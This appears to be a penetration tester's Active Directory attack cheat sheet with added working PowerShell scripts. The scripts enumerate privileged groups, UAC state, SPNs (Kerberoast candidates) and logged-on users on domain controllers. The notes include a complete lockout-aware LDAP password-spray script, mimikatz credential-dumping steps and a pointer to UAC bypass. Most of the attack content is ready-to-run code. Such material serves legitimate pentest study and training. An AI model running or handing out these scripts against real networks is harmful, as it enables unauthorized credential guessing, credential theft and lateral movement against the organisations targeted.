Enumeration
Users / Groups / Computers
Look for users with high privileges across the domain, e.g. members of Domain Admins, or derivative local admins (accounts that are local admin on other hosts and can be chained).
Look for custom groups; their names and descriptions often hint at where they grant local admin rights.
If you can't enumerate the whole domain (no domain read access), at least check your own token: whoami /priv and whoami /groups.
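The group checks above, as an added example that is not part of the original notes: it resolves nested membership of the built-in admin groups and lists custom (non built-in) groups using plain ADSI, so it runs from any domain-joined host without RSAT or PowerView. It assumes the current user has ordinary domain read access; the group names in the loop are the usual suspects, not a list from the page.

```powershell
# Added example, not from the original notes: enumerate high-privilege groups
# (with nested membership resolved) and list custom groups using plain ADSI.
# Assumes domain read access as the current user (the default for domain users).
$root = [ADSI]'LDAP://RootDSE'
$base = [ADSI]"LDAP://$($root.defaultNamingContext)"

function Get-EffectiveMembers {
    # Returns sAMAccountNames of every user that is a member of $GroupName,
    # directly or through nested groups (LDAP_MATCHING_RULE_IN_CHAIN), which a
    # plain read of the 'member' attribute would miss.
    param([string]$GroupName)
    $gs = New-Object System.DirectoryServices.DirectorySearcher($base, "(&(objectClass=group)(cn=$GroupName))")
    $g  = $gs.FindOne()
    if (-not $g) { return }     # e.g. Enterprise Admins only exists in the forest root domain
    $dn = $g.Properties['distinguishedname'][0]
    # A DN containing ( ) * or \ would need LDAP-filter escaping; built-in group DNs have none.
    $us = New-Object System.DirectoryServices.DirectorySearcher($base, "(&(objectCategory=person)(memberOf:1.2.840.113556.1.4.1941:=$dn))")
    $us.PageSize = 1000
    $null = $us.PropertiesToLoad.Add('samaccountname')
    foreach ($u in $us.FindAll()) { $u.Properties['samaccountname'][0] }
}

# Built-in groups whose members are domain admins or can become one cheaply.
foreach ($grp in 'Domain Admins','Enterprise Admins','Administrators','Account Operators','Backup Operators','Server Operators') {
    "== $grp =="
    Get-EffectiveMembers $grp
}

# Custom groups: built-in/protected groups carry isCriticalSystemObject=TRUE,
# so excluding those leaves the ones the organisation created itself.
$cs = New-Object System.DirectoryServices.DirectorySearcher($base, '(&(objectClass=group)(!(isCriticalSystemObject=TRUE)))')
$cs.PageSize = 1000
$null = $cs.PropertiesToLoad.AddRange([string[]]@('name','description'))
"`n== Custom groups =="
foreach ($c in $cs.FindAll()) {
    '{0,-40} {1}' -f $c.Properties['name'][0], ($c.Properties['description'] -join ' ')
}
```

Feed the custom group names into a search for where they are used (local Administrators groups on member servers, GPO restricted groups) to find derivative local admin paths.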
Check whether UAC is enabled (a common reason an uploaded executable such as mimikatz runs but fails at privileged operations even though your user is a local admin: the process gets the filtered, medium-integrity token).
https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/
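The UAC check, as an added example that is not from the original notes: it reads the UAC policy values from the registry and compares them with the current token, so you can tell whether UAC filtering is the obstacle or whether you simply are not a local admin. The verdict strings are my own wording.

```powershell
# Added example, not from the original notes: is UAC what is holding the
# uploaded binary back? Reads the policy and inspects the current token.
$pol = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$id  = [Security.Principal.WindowsIdentity]::GetCurrent()
$pr  = New-Object Security.Principal.WindowsPrincipal($id)

# IsInRole(Administrator) is only true for an elevated (high-integrity) token;
# under UAC the admin SID is present but marked "used for deny only".
$elevated  = $pr.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
$adminLine = whoami /groups | Select-String 'S-1-5-32-544'       # BUILTIN\Administrators
$inAdmins  = [bool]$adminLine
$filtered  = $inAdmins -and ($adminLine.Line -match 'deny only')

$verdict = if ($elevated) { 'already high integrity, UAC is not in the way' }
           elseif ($inAdmins -and $pol.EnableLUA -eq 1) { 'local admin but token is UAC-filtered: elevate or bypass' }
           elseif ($inAdmins) { 'UAC disabled (EnableLUA=0): admin token is unfiltered' }
           else { 'not a local admin: UAC is irrelevant, need privilege escalation' }

[pscustomobject]@{
    EnableLUA                  = $pol.EnableLUA                    # 0 = UAC off entirely
    ConsentPromptBehaviorAdmin = $pol.ConsentPromptBehaviorAdmin   # 0 = elevate silently, 5 = default prompt
    PromptOnSecureDesktop      = $pol.PromptOnSecureDesktop
    InAdministrators           = $inAdmins
    TokenFiltered              = $filtered
    Elevated                   = $elevated
    Verdict                    = $verdict
}
```

ConsentPromptBehaviorAdmin = 0 with EnableLUA = 1 means auto-elevation without a prompt; that combination is what makes a silent bypass trivial.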
Any plaintext credentials lying around? (low-hanging fruit) If so, password spray them.
WinPEAS may reveal plaintext passwords.
When dumping credentials with mimikatz from a process that is not running as SYSTEM, run
privilege::debug first and then token::elevate (impersonate the SYSTEM token) before the dump command.
Other tools
Are there any patterns in users' passwords (season+year, company name, etc.)? Can we make a password list and do a password spray?
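A lockout-aware spray against LDAP, as an added example that is not part of the original notes. The domain name, user list and candidate passwords are constructed for illustration; in practice the users come from enumeration and the candidates from the patterns you spotted. It reads the domain lockout policy first and sends one password per observation window so no account takes more than one failed attempt per window.

```powershell
# Added example, not from the original notes: lockout-aware password spray
# using LDAP binds. All names below are constructed sample data.
Add-Type -AssemblyName System.DirectoryServices.Protocols
$domain = 'corp.local'                          # assumed
$users  = 'alice','bob','svc_backup'            # constructed sample
$year   = (Get-Date).Year
$cands  = "Corp$year!", "Summer$year", "Welcome1"   # constructed pattern guesses

# 1. Read the lockout policy so the spray never exceeds it. DirectorySearcher
#    returns lockOutObservationWindow as Int64 in 100ns units (negative).
$root = [ADSI]'LDAP://RootDSE'
$base = [ADSI]"LDAP://$($root.defaultNamingContext)"
$ps = New-Object System.DirectoryServices.DirectorySearcher($base, '(objectClass=domainDNS)')
$ps.SearchScope = 'Base'
$pol = $ps.FindOne().Properties
$threshold = [int]$pol['lockoutthreshold'][0]                                    # 0 = no lockout
$windowMin = [math]::Abs([long]$pol['lockoutobservationwindow'][0]) / 600000000  # ticks -> minutes
"Lockout threshold: $threshold, observation window: $windowMin min"

# 2. One bind = one badPwdCount increment. On failure the DC's error string
#    carries a 'data' code that separates a wrong password from a locked or
#    disabled account, so a spray can stop before it does damage.
$codes = @{ '52e'='bad password'; '525'='no such user'; '533'='disabled'
            '775'='LOCKED OUT'; '532'='password expired'; '773'='must change password' }
function Test-LdapCred([string]$User, [string]$Pass) {
    $conn = New-Object System.DirectoryServices.Protocols.LdapConnection($domain)
    $conn.AuthType = [System.DirectoryServices.Protocols.AuthType]::Negotiate
    $cred = New-Object System.Net.NetworkCredential($User, $Pass, $domain)
    try   { $conn.Bind($cred); 'VALID' }
    catch [System.DirectoryServices.Protocols.LdapException] {
        $m = $_.Exception.ServerErrorMessage          # e.g. "... AcceptSecurityContext error, data 52e, ..."
        if ($m -match 'data ([0-9a-f]+)') {
            $c = $Matches[1]
            if ($codes[$c]) { $codes[$c] } else { "code $c" }
        } else { $_.Exception.Message }
    }
    finally { $conn.Dispose() }
}

# 3. Spray: one password across all users, then wait out the observation
#    window before the next password.
for ($i = 0; $i -lt $cands.Count; $i++) {
    foreach ($u in $users) {
        $res = Test-LdapCred $u $cands[$i]
        '{0,-15} {1,-15} {2}' -f $u, $cands[$i], $res
        if ($res -eq 'LOCKED OUT') { Write-Warning "$u is locked out; stop and reassess the policy" }
    }
    if ($threshold -gt 0 -and $i -lt $cands.Count - 1) {
        "Sleeping $windowMin min for the observation window to reset..."
        Start-Sleep -Seconds ([int]($windowMin * 60) + 5)
    }
}
```

badPwdCount is tracked per DC and only the PDC emulator sees the authoritative total, so spraying against a single DC and reading the policy from the same one keeps the accounting honest; a threshold of 0 means no lockout and the sleep is skipped.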
Then try RDP
By passing a disk redirection argument to the RDP client (rdesktop -r disk:<name>=<local dir>, or /drive:<name>,<local dir> with xfreerdp), a local directory is exposed on the remote host as the share \\tsclient\<name>, so all the files in that directory can be browsed and copied in both directions without any other transfer channel. It's super useful.
SPN
Service Principal Names (AD Service Accounts)
An SPN is a unique name for a service instance on a host, used to associate that service with an Active Directory account (a machine account or a user-based service account).
Enumerate SPNs to obtain the hostnames (and thus IP addresses) and port numbers of applications running on servers integrated with Active Directory.
Query the Domain Controller in search of SPNs (any domain user can read them).
SPN Examples
CIFS/MYCOMPUTER$ - file share access
LDAP/MYCOMPUTER$ - querying AD info via LDAP
HTTP/MYCOMPUTER$ - web services such as IIS
MSSQLSvc/MYCOMPUTER$ - MSSQL
Perform nslookup of the service hostname -> see if there is an entry point here.
Automated SPN enum scripts:
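The SPN query and the hostname lookup above, combined into one added example that is not from the original notes and not one of the scripts the page refers to: it pulls every SPN from the DC with ADSI, splits each into service class / host / port, resolves the host over DNS (the nslookup step) and flags SPNs that live on user accounts rather than machine accounts, since those are the Kerberoasting candidates. Column names and the output layout are my own.

```powershell
# Added example, not from the original notes: SPN enumeration to a target list.
# Any authenticated domain user can run this; no RSAT or PowerView needed.
$root = [ADSI]'LDAP://RootDSE'
$base = [ADSI]"LDAP://$($root.defaultNamingContext)"
$s = New-Object System.DirectoryServices.DirectorySearcher($base, '(servicePrincipalName=*)')
$s.PageSize = 1000
$null = $s.PropertiesToLoad.AddRange([string[]]@('samaccountname','serviceprincipalname','objectclass'))

$rows = foreach ($r in $s.FindAll()) {
    $acct   = $r.Properties['samaccountname'][0]
    $isUser = -not ($r.Properties['objectclass'] -contains 'computer')
    foreach ($spn in $r.Properties['serviceprincipalname']) {
        # SPN format: serviceclass/host[:port][/servicename]
        $svc, $rest = $spn -split '/', 2
        $hostPort   = ($rest -split '/')[0]
        $hostName, $port = $hostPort -split ':', 2     # $host is a reserved automatic variable, hence $hostName
        $ip = $null
        try {
            # Same thing as 'nslookup <host>': a name that no longer resolves is a stale SPN, not a target.
            $ip = ([System.Net.Dns]::GetHostAddresses($hostName) |
                   Where-Object { $_.AddressFamily -eq 'InterNetwork' } |
                   Select-Object -First 1).IPAddressToString
        } catch { }
        [pscustomobject]@{ Account = $acct; UserAccount = $isUser; Service = $svc
                           Host = $hostName; Port = $port; IP = $ip; SPN = $spn }
    }
}

$rows | Sort-Object Host, Service | Format-Table Service, Host, Port, IP, Account -AutoSize

"`n== SPNs on user accounts (Kerberoast candidates) =="
$rows | Where-Object UserAccount | Select-Object -Unique Account
```

Service classes with an explicit port (MSSQLSvc/host:1433, HTTP/host:8443) give you the port directly; for the rest the class implies it (CIFS 445, LDAP 389/636). Resolution is done once per SPN, so on a large domain expect this to take a while.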
Logged-in users and active user sessions.
More powerview commands https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters/powerview
Domain Controller hostname (PdcRoleOwner)
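The PdcRoleOwner lookup and the logged-in user check above, as one added example that is not from the original notes or from PowerView: it uses the .NET ActiveDirectory classes to find the PDC emulator and every DC, then queries each DC's logon sessions over WMI. Remote WMI normally needs local admin on the target, so the access-denied case is handled rather than hidden.

```powershell
# Added example, not from the original notes: PDC emulator, DC list and
# logged-on users per DC with built-in .NET and WMI (Windows PowerShell 5.1).
$domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
"Domain       : $($domain.Name)"
"PDC emulator : $($domain.PdcRoleOwner.Name)"      # the same value PowerView reports as PdcRoleOwner

foreach ($dc in $domain.DomainControllers) {
    "`n== $($dc.Name) ($($dc.IPAddress)) =="
    try {
        # Win32_LoggedOnUser lists logon sessions; Antecedent holds the account as
        # ...:Win32_Account.Domain="DOM",Name="user". Get-WmiObject goes over DCOM,
        # which is why it is used here instead of Get-CimInstance (WinRM by default).
        Get-WmiObject -Class Win32_LoggedOnUser -ComputerName $dc.Name -ErrorAction Stop |
            ForEach-Object {
                if ($_.Antecedent -match 'Domain="([^"]+)",Name="([^"]+)"') { "$($Matches[1])\$($Matches[2])" }
            } | Sort-Object -Unique
    } catch {
        "  no session data: $($_.Exception.Message)"   # typically access denied without local admin on the DC
    }
}
```

Sessions of privileged users on a host you already control are what make the "derivative local admin" path worth checking: their credentials are in LSASS there.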